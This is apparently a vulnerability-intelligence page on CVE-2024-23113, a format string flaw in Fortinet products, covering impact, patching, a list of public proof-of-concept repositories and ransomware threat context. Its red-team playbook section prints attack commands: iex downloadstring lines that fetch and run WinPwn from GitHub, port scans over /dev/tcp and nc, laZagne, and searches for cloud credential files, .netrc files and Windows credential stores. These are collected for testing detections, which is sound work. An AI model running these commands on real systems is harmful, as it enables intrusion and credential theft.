CVE-2024-23113
Overview
This vulnerability is a use of externally-controlled format string flaw affecting Fortinet FortiSwitchManager and related products. It arises from improper handling of user-supplied input used directly as a format string in logging or output functions. The affected component is the input processing mechanism within FortiSwitchManager versions 7.2.0 through 7.2.3 and 7.0.0 through 7.0.3, as well as specific FortiOS, FortiProxy, and FortiPAM versions.
Vulnerability Description
A use of externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows attacker to execute unauthorized code or commands via specially crafted packets.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code or commands on the affected Fortinet devices remotely. This enables full system compromise, including unauthorized control over device operations, potential data exfiltration, and disruption of network services. The exploit requires no user interaction or credentials, increasing the risk of widespread exploitation in exposed environments. Successful exploitation can lead to significant operational and security impacts for organizations relying on these Fortinet products.
Solution
Fortinet has released security updates addressing this vulnerability in FortiSwitchManager versions 7.2.4 and later, as well as corresponding patches for FortiOS, FortiProxy, and FortiPAM. Administrators should apply the latest firmware updates as detailed in Fortinet advisory FG-IR-24-029 available at https://fortiguard.com/psirt/FG-IR-24-029. No workarounds are recommended; prompt patching is required to mitigate exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in question arises from a use of externally-controlled format strings within specific versions of Fortinet's FortiOS, FortiProxy, FortiPAM, and FortiSwitchManager. This flaw allows an attacker to manipulate format strings in a way that can lead to unauthorized code execution or command execution. The nature of format string vulnerabilities typically stems from improper validation of user input, where an attacker can craft input that alters the intended behavior of a program. In this case, the affected products fail to adequately sanitize incoming packets, enabling malicious actors to inject arbitrary code into the execution flow of the affected systems.
Attack vectors for exploiting this vulnerability are diverse and can be executed remotely, making it particularly dangerous. An attacker could send specially crafted packets to the affected devices, which would then be processed by the vulnerable components. Given that Fortinet products are often deployed in critical network infrastructure roles, such as firewalls and proxies, the potential for exploitation is significant. Scenarios might include an attacker gaining access to sensitive data, disrupting services, or even taking full control of the affected devices. The ability to execute unauthorized commands could lead to further network breaches, data exfiltration, or the deployment of additional malware within the organization.
The real-world impact of this vulnerability is profound, especially for organizations relying on Fortinet products for their cybersecurity posture. With a CVSS score of 9.8, the risk is categorized as critical, indicating that successful exploitation could lead to severe consequences. Businesses may face operational disruptions, reputational damage, and financial losses due to recovery efforts and potential regulatory fines. Furthermore, the presence of such a vulnerability could undermine customer trust, particularly if sensitive information is compromised. Organizations that fail to address this vulnerability may find themselves at a heightened risk of targeted attacks, as threat actors often seek out known vulnerabilities in widely used products.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected Fortinet products is paramount, as the vendor typically releases updates that address known vulnerabilities. Additionally, employing intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help identify and block malicious traffic attempting to exploit this flaw. Network segmentation can also be an effective strategy, limiting the potential impact of an attack by isolating critical systems from less secure environments. Organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively, ensuring that their defenses remain robust against evolving threats.
In conclusion, the vulnerability present in Fortinet's products represents a significant risk to organizations that utilize these systems in their network infrastructure. The potential for unauthorized code execution through crafted packets poses a serious threat, necessitating immediate attention and action from affected entities. By prioritizing timely updates, employing robust detection mechanisms, and fostering a culture of security awareness, organizations can mitigate the risks associated with this vulnerability and strengthen their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-23113, coinciding with the emergence of new proof-of-concept exploits publicly available on multiple platforms. Although the EPSS score has slightly declined, this decrease does not reflect a diminished threat; rather, it underscores the complex dynamics between exploit availability and actual attack frequency. Our telemetry indicates that adversaries are actively incorporating these new tools into their operational playbooks, broadening the exploit landscape and increasing the likelihood of successful unauthorized code execution against vulnerable Fortinet FortiSwitchManager deployments. Importantly, while no direct ransomware campaigns have been conclusively linked to this vulnerability, the presence of known ransomware-associated groups such as akira and ransomhub in related threat intelligence underscores the potential for opportunistic exploitation. This evolving environment elevates the risk posture for defenders, emphasizing the need for heightened vigilance despite the marginal EPSS score reduction.
Update 2 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-23113, with telemetry indicating a significant uptick in exploit attempts targeting Fortinet FortiSwitchManager environments. This surge is accompanied by a notable increase in the Exploit Prediction Scoring System (EPSS) value, reflecting growing confidence in the likelihood of exploitation in the wild. Concurrently, new proof-of-concept exploits have emerged publicly, broadening the attack surface and lowering the barrier for adversaries to weaponize this vulnerability. Although no direct ransomware campaigns have been conclusively linked to this CVE, the continued association of ransomware-linked groups such as akira and ransomhub within related intelligence underscores a persistent risk of opportunistic exploitation. This evolving threat landscape elevates the urgency for defenders to intensify monitoring and detection efforts, as the increased exploitation activity and expanding exploit toolkit materially raise the threat level posed by this vulnerability.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiswitchmanager | All |
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiswitchmanager | All |
cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortipam | All |
cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortipam | All |
cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortipam | 1.2.0 |
cpe:2.3:o:fortinet:fortipam:1.2.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
p33d/CVE-2024-23113
|
p33d | 11 | 4 | 2024-10-21 | View |
|
CheckCve2/CVE-2024-23113
test_private_CVE
|
CheckCve2 | 1 | 1 | 2024-10-11 | View |
|
puckiestyle/CVE-2024-23113
|
puckiestyle | 1 | 1 | 2024-10-31 | View |
|
ownouwa/cve-2024-23113-poc
CVE-2024-23113 是一个在 Linux Kernel 中被发现的漏洞,它属于 任意代码执行漏洞,影响了 bpf (Berkeley Packet Filter) 子系统。具体来说,这个漏洞影响了 bpf 程序的 bpf_prog...
|
ownouwa | 0 | 1 | 2025-03-20 | View |
|
MAVRICK-1/cve-2024-23113-test-env
|
MAVRICK-1 | 1 | 0 | 2025-07-02 | View |
|
MinhPham123456789/PoC-CVE-2024-23113
A proof of concept for CVE 2024 23113 inspired by WatchTowr's article.
|
MinhPham123456789 | 0 | 0 | 2026-05-25 | View |
|
valornode/CVE-2024-23113
This python scripts searches a client list to see if their FortiGate device is vulnerable to this CVE.
|
valornode | 0 | 0 | 2025-05-02 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-135 | Format String Injection |
48%
|
High | High | |
| CAPEC-67 | String Format Overflow in syslog() |
38%
|
High | Very High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-23113 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-24-029 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23113 |